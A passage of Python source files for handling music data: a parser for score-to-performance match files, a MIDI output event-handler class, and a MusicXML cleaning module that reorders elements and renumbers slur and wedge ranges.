(0, 0) base_class = ({'c':0,'d':2,'e':4,'f':5,'g':7,'a':9,'b':11}[name.lower()] + {'b':-1,'bb':-2,'#':1,'x':2,'##':2,'n':0}[modifier]) mid = (octave + 1) * 12 + base_class #for mozartmatch files (in which the octave numbers are off by one) #mid = octave*12 + base_class pitchclass = base_class % 12 return (mid, pitchclass) class MatchLine(object): """ A class that represents a line in a match file. It is intended to be subclassed. It's constructor sets up a list of field names as object attributes. """ field_names = [] re_obj = re.compile('') def __str__(self): r = [self.__class__.__name__] for fn in self.field_names: r.append(' {0}: {1}'.format(fn,self.__dict__[fn])) return '\n'.join(r)+'\n' def __init__(self, match_obj, field_interpreter = interpret_field_rational): self.set_attributes(match_obj, field_interpreter) @classmethod def match_pattern(self,s, pos = 0): """ Return a regular expression match object that matches the pattern to the given string, or None if no match was found :param s: the string to be matched :returns: match object, or None """ return self.re_obj.search(s, pos = pos) def set_attributes(self, match_obj, field_interpreter = lambda x: x): """ Set attribute objects using values from a regular expression match object; use `field_interpreter` to interpret the attribute value strings as integers, floats, strings, etc. :param match_obj: regular expression match object :param field_interpreter: function that returns an object given a string """ groups = [field_interpreter(i) for i in match_obj.groups()] if len(self.field_names) == len(groups): for (a,v) in zip(self.field_names,groups): setattr(self,a,v) class UnknownMatchLine(MatchLine): """ A dummy class that represents a line that does not fit to any specified pattern """ def __init__(self,line): self.line = line class Note(MatchLine): """ Class representing the played note part of a match line """ field_names = ['Number','NoteName','Modifier','Octave', 'Onset','Offset','AdjOffset','Velocity' ] pattern = 'note\(([^,]+),\[([^,]+),([^,]+)\],([^,]+),([^,]+),([^,]+),([^,]+),([^,]+)\)' re_obj = re.compile(pattern) def __init__(self, m): MatchLine.__init__(self, m) self.MidiPitch = pitch_name_2_midi_PC(self.Modifier, self.NoteName, self.Octave) class TrailingNoteLine(MatchLine): """ Class representing a Trailing Note line """ field_names = ['Number','NoteName','Modifier','Octave', 'Onset','Offset','AdjOffset','Velocity' ] pattern = 'note\((.+),\[(.+),(.+)\],(.+),(.+),(.+),(.+),(.+)\)' re_obj = re.compile(pattern) def __init__(self, m): self.note = Note(m) class Snote(MatchLine): """ Class representing the score note part of a match line """ field_names = ['Anchor','NoteName','Modifier','Octave', 'Bar','Beat','Offset','Duration', 'OnsetInBeats','OffsetInBeats','ScoreAttributesList'] #pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)' pattern = 'snote\(([^,]+),\[([^,]+),([^,]+)\],([^,]+),([^,]+):([^,]+),([^,]+),([^,]+),([^,]+),([^,]+),\[(.*)\]\)' re_obj = re.compile(pattern) def __init__(self, m = None): if m != None: MatchLine.__init__(self,m) self.DurationSymbolic = m.groups()[7] self.ScoreAttributesList = self.ScoreAttributesList.split(',') @cached_property def DurationInBeats(self): return self.OffsetInBeats -self.OnsetInBeats @cached_property def MidiPitch(self): return pitch_name_2_midi_PC(self.Modifier, self.NoteName, self.Octave) class InfoLine(MatchLine): """ Class representing an Info line """ field_names = ['Attribute','Value'] pattern = 'info\(\s*([^,]+)\s*,\s*(.+)\s*\)\.' re_obj = re.compile(pattern) class MetaLine(MatchLine): """ Class representing a Meta line """ field_names = ['Attribute','Value','Bar','TimeInBeats'] pattern = 'meta\(\s*([^,]*)\s*,\s*([^,]*)\s*,\s*([^,]*)\s*,\s*([^,]*)\s*\)\.' re_obj = re.compile(pattern) class SustainPedalLine(MatchLine): """ Class representing a sustain pedal line """ field_names = ['Time','Value'] pattern = 'sustain\(\s*([^,]*)\s*,\s*([^,]*)\s*\)\.' re_obj = re.compile(pattern) class SoftPedalLine(MatchLine): """ Class representing a soft pedal line """ field_names = ['Time','Value'] pattern = 'soft\(\s*([^,]*)\s*,\s*([^,]*)\s*\)\.' re_obj = re.compile(pattern) class SnoteNoteLine(MatchLine): """ Class representing a "match" (containing snote and note) """ pattern = Snote.pattern+'-'+Note.pattern re_obj = re.compile(pattern) def __init__(self,m1,m2): self.snote = Snote(m1) self.note = Note(m2) class SnoteDeletionLine(MatchLine): """ Class representing the deletion of an snote """ field_names = Snote.field_names pattern = Snote.pattern+'-deletion\.' # unused for efficiency reasons re_obj = re.compile(pattern) def __init__(self, m1): self.snote = Snote(m1) class InsertionNoteLine(MatchLine): # field_names = Note.field_names field_names = [] pattern = 'insertion-'+Note.pattern # unused for efficiency reasons re_obj = re.compile(pattern) def __init__(self, m2): self.note = Note(m2) class HammerBounceNoteLine(MatchLine): field_names = Note.field_names pattern = 'hammer_bounce-'+Note.pattern # unused for efficiency reasons re_obj = re.compile(pattern) def __init__(self, m2): self.note = Note(m2) class OrnamentNoteLine(MatchLine): field_names = Note.field_names pattern = 'ornament\([^\)]*\)-'+Note.pattern # unused for efficiency reasons re_obj = re.compile(pattern) def __init__(self, m2): self.note = Note(m2) class TrillNoteLine(MatchLine): field_names = Note.field_names pattern = 'trill\([^\)]*\)-'+Note.pattern # unused for efficiency reasons re_obj = re.compile(pattern) def __init__(self, m2): self.note = Note(m2) class SnoteTrailingLine(MatchLine): field_names = ['Anchor','NoteName','Modifier','Octave', 'Bar','Beat','Offset','Duration', 'OnsetInBeats','OffsetInBeats','ScoreAttributesList'] pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)' re_obj = re.compile(pattern) def __init__(self,m): self.snote = Snote(m) class SnoteOnlyLine(MatchLine): field_names = ['Anchor','NoteName','Modifier','Octave', 'Bar','Beat','Offset','Duration', 'OnsetInBeats','OffsetInBeats','ScoreAttributesList'] pattern = 'snote\((.+),\[(.+),(.+)\],(.+),(.+):(.+),(.+),(.+),(.+),(.+),\[(.*)\]\)' re_obj = re.compile(pattern) def __init__(self, m): self.snote = Snote(m) class MatchFile(object): """ Class for representing MatchFiles. It is instantiated by giving the filename of a Match file """ def __init__(self, filename): """ Read the contents of a Match file `filename` :param filename: filename of a match file """ fileData = [l.decode('utf8').strip() for l in open(filename,'rb')] self.name = filename self.voiceIdxFile = [] # the lines of the file, represented as MatchLine objects self.lines = np.array([self.parse_matchline(l) for l in fileData]) @cached_property def _info(self): """ Return all InfoLine objects """ return [i for i in self.lines if isinstance(i,InfoLine)] def info(self, attribute = None): """ Return the value of the InfoLine object corresponding to attribute, or None if there is no such object :param attribute: the name of the attribute to return the value for """ if attribute: try: idx = [i.Attribute for i in self._info].index(attribute) return self._info[idx].Value except: return None else: return self._info @cached_property def sustain_lines(self): """ Return all sustain pedal lines """ return [i for i in self.lines if isinstance(i,SustainPedalLine)] @cached_property def soft_lines(self): """ Return all soft pedal lines """ return [i for i in self.lines if isinstance(i,SoftPedalLine)] @cached_property def note_pairs(self): """ Return all (snote, note) tuples """ return [(x.snote, x.note) for x in self.lines if isinstance(x, SnoteNoteLine)] def lines_at_score_times(self, times): """ Return all lines with snotes that span any value t in the array `times` :param times: array of floats :returns: a list of MatchLine objects for each value t in `times` """ snoteLines = [l for l in self.lines if hasattr(l,'snote')] onoffsets = np.array([(l.snote.OnsetInBeats,l.snote.OffsetInBeats) for l in snoteLines], dtype=np.dtype([('onset',np.float),('offset',np.float)])) lidx = np.argsort(onoffsets,order=('onset','offset')) tidx = np.argsort(times) i = 0 i_min = 0 result = [] for t in times[tidx]: r = [] ii = [] i = i_min while i < len(lidx) and not (onoffsets['onset'][lidx[i]] > t and onoffsets['offset'][lidx[i]] > t): if (onoffsets['onset'][lidx[i]] <= t and onoffsets['offset'][lidx[i]] > t): r.append(lidx[i]) ii.append(i) i += 1 if len(ii) > 0: i_min = ii[0] result.append(r) return [[snoteLines[x] for x in notes] for notes in result] @cached_property def first_onset(self): """ The earliest snote onset in the file """ self.snote_idx() if len(self.snoteIdx) == 0: return None else: return self.lines[self.snoteIdx[0]].snote.OnsetInBeats @cached_property def time_signatures(self): """ A list of tuples (t, (a, b)), indicating a time signature of a over b, starting at t """ tspat = re.compile('([0-9]+)/([0-9]*)') m = [(int(x[0]),int(x[1])) for x in tspat.findall(self.info('timeSignature'))] timeSigs = [] if len(m) > 0: timeSigs.append((self.first_onset, m[0])) for l in self.time_sig_lines(): timeSigs.append((float(l.TimeInBeats),[(int(x[0]),int(x[1])) for x in tspat.findall(l.Value)][0])) timeSigs = list(set(timeSigs)) timeSigs.sort(key=lambda x: x[0]) return timeSigs def _time_sig_lines(self): return [i for i in self.lines if isinstance(i,MetaLine) and hasattr(i,'Attribute') and i.Attribute == 'timeSignature'] def time_sig_lines(self): ml = self._time_sig_lines() if len(ml) == 0: ts = self.info('timeSignature') ml = [self.parse_matchline('meta(timeSignature,{0},1,{1}).'.format(ts,self.first_onset()))] return ml def snote_idx(self): """ Return the line numbers that have snotes """ if hasattr(self,'snotes'): return self.snoteIdx else: self.snoteIdx = [i for i,l in enumerate(self.lines) if hasattr(l,'snote')] return self.snoteIdx def soprano_voice(self, return_indices = False): """ Return the snotes marked as soprano notes (excluding those marked as grace notes) :param return_indices: if True, return the line numbers of the soprano notes, otherwise return the corresponding MatchLines themselves :returns: a list of line numbers, or MatchLine objects """ if return_indices: return [i for i,l in enumerate(self.lines) if hasattr(l,'snote') and 's' in l.snote.ScoreAttributesList and not 'grace' in l.snote.ScoreAttributesList and l.snote.Duration > 0.0] else: return [l for l in self.lines if hasattr(l,'snote') and 's' in l.snote.ScoreAttributesList and not 'grace' in l.snote.ScoreAttributesList and l.snote.Duration > 0.0] def highest_voice_without_indexfile(self, exclude_grace = True, return_indices = False): """ Return the highest snotes :param exclude_grace: if True, leave out any grace notes (default: True) :param return_indices: if True, return the line numbers of the soprano notes, otherwise return the corresponding MatchLines themselves (default: False) :returns: a list of line numbers, or MatchLine objects """ sopr = self.soprano_voice(return_indices) if len(sopr) > 0: return(sopr) def is_grace(note): return 'grace' in note.ScoreAttributesList def in_lower_staff(note): return 'staff2' in note.ScoreAttributesList idx = self.snote_idx() features = [] for i,idx in enumerate(self.snoteIdx): n = self.lines[idx].snote if not (in_lower_staff(n) or (exclude_grace and is_grace(n)) or n.Duration == 0.0): features.append((n.OnsetInBeats,n.OffsetInBeats,n.MidiPitch[0],i)) features = np.array(features) # sort according to pitch (highest first) features = features[np.argsort(features[:,2])[::-1]] # sort according to onset (smallest first) features = features[np.argsort(features[:,0],kind='mergesort')] voice = [features[0,:]] for f in features: # if onset is later_eq than last voice offset, add next note if f[0] >= voice[-1][1]: voice.append(f) # indices into the list of snotes indices = np.array(np.array(voice)[:,3],np.int) if return_indices: return np.array(self.snoteIdx)[indices] else: #return [m for i,m in enumerate(self.lines[self.snoteIdx]) if i in indices] return [l for l in self.lines[self.snoteIdx][indices]] def parse_matchline(self,l): """ Return objects representing the line as one of: * hammer_bounce-PlayedNote. * info(Attribute, Value). * insertion-PlayedNote. * ornament(Anchor)-PlayedNote. * ScoreNote-deletion. * ScoreNote-PlayedNote. * ScoreNote-trailing_score_note. * trailing_played_note-PlayedNote. * trill(Anchor)-PlayedNote. * meta(Attribute,Value,Bar,Beat). or False if none can be matched """ snoteMatch = Snote.match_pattern(l) noteMatch = Note.match_pattern(l,pos = snoteMatch.end() if snoteMatch else 0) if snoteMatch: if noteMatch: return SnoteNoteLine(snoteMatch,noteMatch) else: if re.compile('-deletion\.$').search(l,pos=snoteMatch.end()): return SnoteDeletionLine(snoteMatch) else: if re.compile('-trailing_score_note\.$').search(l,pos=snoteMatch.end()): return SnoteTrailingLine(snoteMatch) else: return SnoteOnlyLine(snoteMatch) else: # no snoteMatch if noteMatch: if re.compile('^insertion-').search(l,endpos=noteMatch.start()): return InsertionNoteLine(noteMatch) elif re.compile('^trill\([^\)]*\)-').search(l,endpos=noteMatch.start()): return TrillNoteLine(noteMatch) elif re.compile('^ornament\([^\)]*\)-').search(l,endpos=noteMatch.start()): return OrnamentNoteLine(noteMatch) elif re.compile('^trailing_played_note-').search(l,endpos=noteMatch.start()): return TrailingNoteLine(noteMatch) elif re.compile('^hammer_bounce-').search(l,endpos=noteMatch.start()): return HammerBounceNoteLine(noteMatch) else: return False else: metaMatch = MetaLine.match_pattern(l) if metaMatch: return MetaLine(metaMatch,lambda x: x) else: infoMatch = InfoLine.match_pattern(l) if infoMatch: return InfoLine(infoMatch, field_interpreter = interpret_field) else: sustainMatch = SustainPedalLine.match_pattern(l) if sustainMatch: return SustainPedalLine(sustainMatch, field_interpreter = interpret_field) else: softMatch = SoftPedalLine.match_pattern(l) if softMatch: return SoftPedalLine(softMatch, field_interpreter = interpret_field) else: #return UnknownMatchLine(l) return False if __name__ == '__main__': pass ``` #### File: data_handling/midi_backend/MidiOutStream.py ```python class MidiOutStream: """ MidiOutstream is Basically an eventhandler. It is the most central class in the Midi library. You use it both for writing events to an output stream, and as an event handler for an input stream. This makes it extremely easy to take input from one stream and send it to another. Ie. if you want to read a Midi file, do some processing, and send it to a midiport. All time values are in absolute values from the opening of a stream. To calculate time values, please use the MidiTime and MidiDeltaTime classes. """ def __init__(self): # the time is rather global, so it needs to be stored # here. Otherwise there would be no really simple way to # calculate it. The alternative would be to have each event # handler do it. That sucks even worse! self._absolute_time = 0 self._relative_time = 0 self._current_track = 0 self._running_status = None # time handling event handlers. They should be overwritten with care def update_time(self, new_time=0, relative=1): """ Updates the time, if relative is true, new_time is relative, else it's absolute. """ if relative: self._relative_time = new_time self._absolute_time += new_time else: self._relative_time = new_time - self._absolute_time self._absolute_time = new_time def reset_time(self): """ reset time to 0 """ self._relative_time = 0 self._absolute_time = 0 def rel_time(self): "Returns the relative time" return self._relative_time def abs_time(self): "Returns the absolute time" return self._absolute_time # running status methods def reset_run_stat(self): "Invalidates the running status" self._running_status = None def set_run_stat(self, new_status): "Set the new running status" self._running_status = new_status def get_run_stat(self): "Set the new running status" return self._running_status # track handling event handlers def set_current_track(self, new_track): "Sets the current track number" self._current_track = new_track def get_current_track(self): "Returns the current track number" return self._current_track ##################### ## Midi events def channel_message(self, message_type, channel, data): """The default event handler for channel messages""" pass def note_on(self, channel=0, note=0x40, velocity=0x40): """ channel: 0-15 note, velocity: 0-127 """ pass def note_off(self, channel=0, note=0x40, velocity=0x40): """ channel: 0-15 note, velocity: 0-127 """ pass def aftertouch(self, channel=0, note=0x40, velocity=0x40): """ channel: 0-15 note, velocity: 0-127 """ pass def continuous_controller(self, channel, controller, value): """ channel: 0-15 controller, value: 0-127 """ pass def patch_change(self, channel, patch): """ channel: 0-15 patch: 0-127 """ pass def channel_pressure(self, channel, pressure): """ channel: 0-15 pressure: 0-127 """ pass def pitch_bend(self, channel, value): """ channel: 0-15 value: 0-16383 """ pass ##################### ## System Exclusive def system_exclusive(self, data): """ data: list of values in range(128) """ pass ##################### ## Common events def song_position_pointer(self, value): """ value: 0-16383 """ pass def song_select(self, songNumber): """ songNumber: 0-127 """ pass def tuning_request(self): """ No values passed """ pass def midi_time_code(self, msg_type, values): """ msg_type: 0-7 values: 0-15 """ pass ######################### # header does not really belong here. But anyhoo!!! def header(self, format=0, nTracks=1, division=96): """ Parameters ----------- format : number, optional. Default: 0 the type of MIDI file, possible is: 0, 1, 2 nTracks : number, optional. Default: 1 the number of tracks division : number, optional. Default: 96 the timing division # format: type of midi file in [1,2] # nTracks: number of tracks # division: timing division """ pass def eof(self): """ End of file. No more events to be processed. """ pass ##################### ## meta events def meta_event(self, meta_type, data): """ Handles any undefined meta events """ pass def start_of_track(self, n_track=0): """ n_track: number of track """ pass def end_of_track(self): """ n_track: number of track """ pass def sequence_number(self, value): """ value: 0-16383 """ pass def text(self, text): """ Text event text: string """ pass def copyright(self, text): """ Copyright notice text: string """ pass def sequence_name(self, text): """ Sequence/track name text: string """ pass def instrument_name(self, text): """ text: string """ pass def lyric(self, text): """ text: string """ pass def marker(self, text): """ text: string """ pass def cuepoint(self, text): """ text: string """ pass def midi_ch_prefix(self, channel): """ channel: midi channel for subsequent data (deprecated in the spec) """ pass def midi_port(self, value): """ value: Midi port (deprecated in the spec) """ pass def tempo(self, value): """ Parameters ---------- value : number the tempo in microseconds / quarternote. Possible values: 0-2097151 Calculate value from bpm (needs to be quarters per minute?!): value = int(60,000,000.00 / BPM) # value: 0-2097151 # tempo in us/quarternote # (to calculate value from bpm: int(60,000,000.00 / BPM)) """ pass def smtp_offset(self, hour, minute, second, frame, framePart): """ hour, minute, second: 3 bytes specifying the hour (0-23), minutes (0-59) and seconds (0-59), respectively. The hour should be encoded with the SMPTE format, just as it is in MIDI Time Code. frame: A byte specifying the number of frames per second (one of : 24, 25, 29, 30). framePart: A byte specifying the number of fractional frames, in 100ths of a frame (even in SMPTE-based tracks using a different frame subdivision, defined in the MThd chunk). """ pass def time_signature(self, nn, dd, cc, bb): """ nn: Numerator of the signature as notated on sheet music dd: Denominator of the signature as notated on sheet music The denominator is a negative power of 2: 2 = quarter note, 3 = eighth, etc. cc: The number of MIDI clocks in a metronome click bb: The number of notated 32nd notes in a MIDI quarter note (24 MIDI clocks) """ pass def key_signature(self, sf, mi): """ sf: is a byte specifying the number of flats (-ve) or sharps (+ve) that identifies the key signature (-7 = 7 flats, -1 = 1 flat, 0 = key of C, 1 = 1 sharp, etc). mi: is a byte specifying a major (0) or minor (1) key. """ pass def sequencer_specific(self, data): """ data: The data as byte values """ pass ##################### ## realtime events def timing_clock(self): """ No values passed """ pass def song_start(self): """ No values passed """ pass def song_stop(self): """ No values passed """ pass def song_continue(self): """ No values passed """ pass def active_sensing(self): """ No values passed """ pass def system_reset(self): """ No values passed """ pass if __name__ == '__main__': midiOut = MidiOutStream() midiOut.update_time(0, 0) midiOut.note_on(0, 63, 127) midiOut.note_off(0, 63, 127) ``` #### File: extra/data_handling/musicxmlcleaning.py ```python import re import numpy as np from lxml import etree from collections import Counter, defaultdict, OrderedDict from operator import itemgetter import logging logging.basicConfig(level=logging.INFO) LOGGER = logging.getLogger(__name__) CHILD_ORDER = {'//pitch': ['step', 'alter', 'octave'], '//score-partwise': ['work', 'movement-number', 'movement-title', 'identification', 'defaults', 'credit', 'part-list', 'part'], '//work': ['work-number', 'work-title', 'opus'], '//direction': ['direction-type', 'offset', 'footnote', 'level', 'voice', 'staff', 'sound'], '//barline': ['bar-style', 'footnote', 'level', 'wavy-line', 'segno', 'coda', 'fermata', 'ending', 'repeat'], '//identification': ['creator', 'rights', 'encoding', 'source', 'relation, miscellaneous'], '//attributes': ['divisions', 'key', 'time', 'staves', 'part-symbol', 'instruments', 'clef', 'staff-details', 'transpose', 'directive', 'measure-style'], # TODO: add note child order (tricky, because can be different, # depending presence/absence of children) } # min max numbers allowed in number attribute of slurs, wedges, dashes, etc MIN_RANGE = 1 MAX_RANGE = 6 class Colors(object): """Escape codes for color in logging """ HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def get_elements_by_position(measures, target): """ Return a dictionary indexed by position (in `divisions`), where each position key returns a list of elements matching xpath expression `target` at that position in the MusicXML file. `measures`. """ pos = 0 result = defaultdict(list) for m in measures: for e in m: result[pos].extend(e.xpath(target)) dur = 0 if len(e.xpath('./chord[1]')) == 0: try: dur = int(e.xpath('./duration[1]/text()')[0]) except IndexError: pass if e.tag == 'backup': dur = -dur pos += dur for k, v in result.items(): if len(v) == 0: del result[k] return dict(result) def fix_order(doc, xpath, order=None): """ Fix the order of children in elements returned by `doc`.xpath(`xpath`). The order of the children is given by a dictionary order with element tags as keys, and a sorting number as value. Elements whose tags are not in `order` are placed at the end in the order of original occurrence. """ if order is None: order = CHILD_ORDER.get(xpath, {}) if not isinstance(order, dict): order = dict(zip(order, range(len(order)))) elements = doc.xpath(xpath) for e in elements: e[:] = sorted(e, key=lambda x: order.get(x.tag, len(order))) def fix_direction(doc): """ Directions need a direction-type element. This function looks for directions that have no direction-type and if they have a sound element, tries to infer a direction-type from the attributes of the sound element. If no direction-type can be inferred, an Exception is raised. """ directions = doc.xpath('//direction') to_dt = {'dacapo': dict(type='words', text='da capo'), 'fine': dict(type='words', text='fine'), 'segno': dict(type='segno'), 'coda': dict(type='coda') } for d in directions: childtags = [e.tag for e in d] has_dt = 'direction-type' in childtags try: sound_idx = childtags.index('sound') except ValueError: continue if not has_dt: dts = set.intersection(set(to_dt.keys()), set(d[sound_idx].attrib.keys())) if len(dts) > 0: for w in dts: dt = etree.Element('direction-type') e = etree.Element(to_dt[w]['type']) if 'text' in to_dt[w]: e.text = to_dt[w]['text'] dt.append(e) d.append(dt) else: raise Exception("Do not know how to deal with direction without direction-type (children: {})" .format(childtags)) # chtagset = set(childtags).difference(set(('offset', 'staff', 'sound' # 'footnote', 'level', 'voice'))) # if len(chtagset) # s = d[sound_idx] # d.remove(s) # p = d.getparent() # p.insert(p.index(d), s) # p.remove(d) def get_position_info(e, return_dict=False): """ Build a string that provides position information for the element, only intended for manual inspection. """ # TODO, don't assume e is inside a measure m = [x for x in e.iterancestors() if x.tag == 'measure'][0] note = [x for x in e.iterancestors() if x.tag == 'note'] if len(note) > 0: noteinfo = ' (note id: {}; left/top: {:.0f} / {:.0f})'.format( note[0].get('ID'), float(note[0].xpath('coordinates/pixel/left')[0].text), float(note[0].xpath('coordinates/pixel/top')[0].text)) else: noteinfo = '' if return_dict: return dict(measure=m.get('number'), page=m.get('page'), system=m.get('system')) else: return ('measure number {}, page {}, system {}{}' .format(m.get('number'), m.get('page'), m.get('system'), noteinfo)) def try_compress_numbers_to_range(elements): """ Map the "number" attribute of any element in `elements` to the most compact range possible (starting from 1). If the resulting numbers are within [MIN_RANGE, MAX_RANGE], return True, otherwise, return False. If it is not possible to obtain a mapping within [MIN_RANGE, MAX_RANGE], the number attributes not modified. """ numbers = set(int(e.get('number')) for e in elements) if len(numbers) <= ((MAX_RANGE - MIN_RANGE) + 1): actual_nrs = sorted(numbers) ideal_nrs = range(MIN_RANGE, MIN_RANGE + len(numbers)) if np.any(np.array(actual_nrs) != np.array(ideal_nrs)): nr_map = dict(zip(actual_nrs, ideal_nrs)) LOGGER.debug(u'compressing number range {}' .format(', '.join(u'{} → {}'.format(k, v) for k, v in nr_map.items()))) for e in elements: old_nr = int(e.get('number')) new_nr = nr_map[old_nr] e.set('number', str(new_nr)) all_within_range = True else: all_within_range = False return all_within_range def get_first_non_blacklisted(blacklist): """Return the first integer not in `blacklist`. """ i = 1 while i in blacklist: i += 1 return i def get_note_ancestor(e): """ Return the first ancestor of `e` with tag "note", or None if there is no such ancestor. """ for a in e.iterancestors(): if a.tag == 'note': return a return None # def get_pitch(n): # """ # """ # pitch = n.xpath('pitch')[0] # return '{} {} {}'.format(''.join(pitch.xpath('step/text()')), # ''.join(pitch.xpath('alter/text()')), # ''.join(pitch.xpath('octave/text()'))) def remove_redundant_ranges(ebp, pbe): matches, false_starts, false_stops = match_start_stop_elements(ebp) be_note_pairs = defaultdict(list) # be_pos_pairs = defaultdict(list) for e_start, e_end in matches.items(): n_start = get_note_ancestor(e_start) n_end = get_note_ancestor(e_end) # if n_start and n_end and get_pitch(n_start) == get_pitch(n_end): # print('tie?') # be_pos_pairs[(pbe[e_start], pbe[e_end])].append(e_start) be_note_pairs[(n_start, n_end)].append(e_start) if (None, None) in be_note_pairs: del be_note_pairs[(None, None)] for ee in be_note_pairs.values(): if len(ee) > 1: LOGGER.debug('removing {} redundant items'.format(len(ee) -1)) for e_start in ee[1:]: e_start.getparent().remove(e_start) e_end = matches[e_start] e_end.getparent().remove(e_end) def fix_start_stop_numbers(doc, xpath): """ Change the "number" attributes of elements matching `xpath` to lie within the interval [MIN_RANGE, MAX_RANGE]. As opposed to the function `try_compress_numbers_to_range` this function keeps track of which numbered ranges are active, and reuses numbers if there are no ongoing ranges with that number. It does not use numbers occurring in erroneous ranges (ranges for which there are unmatched start or stop elements). """ measures = doc.xpath('.//measure') ebp = get_elements_by_position(measures, xpath) pbe = dict((e, p) for p, ee in ebp.items() for e in ee) LOGGER.debug('mismatches before corrections:') ebp = get_elements_by_position(measures, xpath) pbe = dict((e, p) for p, ee in ebp.items() for e in ee) check_mismatches(ebp) # fn = '/tmp/{}_before.txt'.format(re.sub('\W', '', xpath)) # plot_ranges(ebp, fn) remove_redundant_ranges(ebp, pbe) # ebp = get_elements_by_position(measures, xpath) # pbe = dict((e, p) for p, ee in ebp.items() for e in ee) all_within_range = try_compress_numbers_to_range([e for ee in ebp.values() for e in ee]) if all_within_range: LOGGER.debug('{}all within range{}'.format(Colors.OKGREEN, Colors.ENDC)) return True else: LOGGER.debug('not all within range') matches, false_starts, false_stops = match_start_stop_elements(ebp) inv_matches = dict((v, k) for k, v in matches.items()) # print('false st/st', len(false_starts), len(false_stops)) blacklist = set([int(e.get('number', -1)) for e in false_starts + false_stops if MIN_RANGE <= int(e.get('number', -1)) <= MAX_RANGE]) LOGGER.debug('blacklist: {}'.format(blacklist)) active = defaultdict(set) active_at_pos = {} positions = np.array(sorted(ebp.keys())) for p_np in positions: p = int(p_np) ee = sorted(ebp[p], key=lambda x: x.get('type'), reverse=True) for e in ee: n = int(e.get('number', -1)) t = e.get('type') if t in ('start', 'crescendo', 'diminuendo'): active[n].add(e) elif t == 'stop': try: active[n].remove(inv_matches[e]) except KeyError: pass else: raise Exception() active_at_pos[p] = set(x for y in active.values() for x in y) # for p in positions: # active = active_at_pos[int(p)] # if len(active) > 0: # print('{}: {}'.format(int(p), [int(e.get('number')) for e in active])) for b, e in matches.items(): n = int(b.get('number')) if n in blacklist: continue start = pbe[b] end = pbe[e] span = positions[np.logical_and(positions >= start, positions < end)] concurrent = set(int(x.get('number', -1)) for p in span for x in active_at_pos[int(p)].difference(set((b,)))) blacklist_for_range = blacklist.union(concurrent) new_n = get_first_non_blacklisted(blacklist_for_range) if not MIN_RANGE <= new_n <= MAX_RANGE: #LOGGER.warning('Cannot renumber start-stop into valid range',start, end, n, new_n, concurrent) LOGGER.warning('Cannot renumber start-stop into valid range (orig. nr: {}; new nr: {}; co-occuring numbers: {})'.format(n, new_n, concurrent)) LOGGER.warning('Position: ' + get_position_info(b)) else: if n != new_n: LOGGER.debug(u'renumbering {} → {} (blacklisted: {})'.format(n, new_n, list(blacklist_for_range))) # print(start, end, n, '->', new_n, blacklist_for_range) b.set('number', str(new_n)) e.set('number', str(new_n)) LOGGER.debug('mismatches after corrections:') ebp = get_elements_by_position(measures, xpath) check_mismatches(ebp) fn = '/tmp/{}_after.txt'.format(re.sub('\W', '', xpath)) plot_ranges(ebp, fn) def check_mismatches(ebp): """ Check if there are any mis-matched range start/stop elements. Only for informational purposes. """ matches, false_starts, false_stops = match_start_stop_elements(ebp) pbe = dict((e, p) for p, ee in ebp.items() for e in ee) false_start_by_nr = Counter() false_stop_by_nr = Counter() for e in false_starts: false_start_by_nr.update((int(e.get('number', -1)),)) for e in false_stops: false_stop_by_nr.update((int(e.get('number', -1)),)) nrs = set.union(set(false_start_by_nr.keys()), set(false_stop_by_nr.keys())) for n in nrs: LOGGER.debug(u'{}number {} has {} false starts and {} false stops{}'.format( Colors.FAIL, n, false_start_by_nr[n], false_stop_by_nr[n], Colors.ENDC).encode('utf8')) # counter = defaultdict(lambda: defaultdict(lambda: 0)) # for p in sorted(ebp.keys()): # # sort elements by reverse lexical order of attribute type, to ensure # # that "stop" elements are handled before "start" elements (nevermind # # "diminuendo", "crescendo") # for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True): # n = int(e.get('number', -1)) # t = e.get('type') # counter[n][t] += 1 # for k, ss in counter.items(): # # print(k,ss['start'], ss['stop']) # # if ss['start'] != ss['stop']: # nstart = sum(ss[t] for t in ('start', 'diminuendo', 'crescendo')) # if not nstart == ss['stop']: # level = Colors.FAIL # else: # level = Colors.OKGREEN # print(u'{}number {} has {} starts and {} stops{}'.format( # level, k, nstart, ss['stop'], Colors.ENDC).encode('utf8')) # def plot_ss(ebp, outfile, false_starts=[], false_stops=[]): # symb = dict(start='<', stop='>') # with open(outfile, 'w') as f: # for p in sorted(ebp.keys()): # for e in ebp[p]: # n = int(e.get('number', -1)) # t = e.get('type') # s = symb[t] # f.write('{} {} {}\n'.format(p, n, s)) # def plot_ranges(ebp, outfile): # symb = dict(start='<', # crescendo='<', # diminuendo='<', # stop='>', # false_start='X', # false_stop='Y' # ) # matches, false_starts, false_stops = match_start_stop_elements(ebp) # # print('false starts', len(false_starts)) # # print('false stops', len(false_stops)) # pbe = dict((e, p) for p, ee in ebp.items() for e in ee) # data = [] # active = defaultdict(list) # n_active = {} # for p in sorted(ebp.keys()): # for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True): # n = int(e.get('number', -1)) # t = e.get('type') # if t in ('start', 'crescendo', 'diminuendo'): # active[n].append(e) # elif t == 'stop': # try: # active[n].pop() # except: # pass # else: # raise Exception() # n_active[p] = sum(len(x) for x in active.values()) # for s, e in matches.items(): # data.append((pbe[s], int(s.get('number')), symb[s.get('type')], n_active[pbe[s]])) # data.append((pbe[e], int(e.get('number')), symb[e.get('type')], n_active[pbe[e]])) # for s in false_starts: # # print(pbe[s], get_position_info(s)) # data.append((pbe[s], int(s.get('number')), symb['false_start'], n_active[pbe[s]])) # for s in false_stops: # data.append((pbe[s], int(s.get('number')), symb['false_stop'], n_active[pbe[s]])) # data.sort(key=itemgetter(0)) # with open(outfile, 'w') as f: # for row in data: # f.write('{} {} {} {}\n'.format(*row)) def match_start_stop_elements(ebp): """ Return a list of matching start/stop elements, as well as a list of non-matched start and non-matched stop elements, occurring in the values of dictionary `ebp` (as returned by `get_elements_by_position`). """ matches = {} started = defaultdict(list) false_starts = [] false_stops = [] for p in sorted(ebp.keys()): # sort elements by reverse lexical order of attribute type, to ensure # that "stop" elements are handled before "start" elements (nevermind # "diminuendo", "crescendo") for e in sorted(ebp[p], key=lambda x: x.get('type'), reverse=True): n = 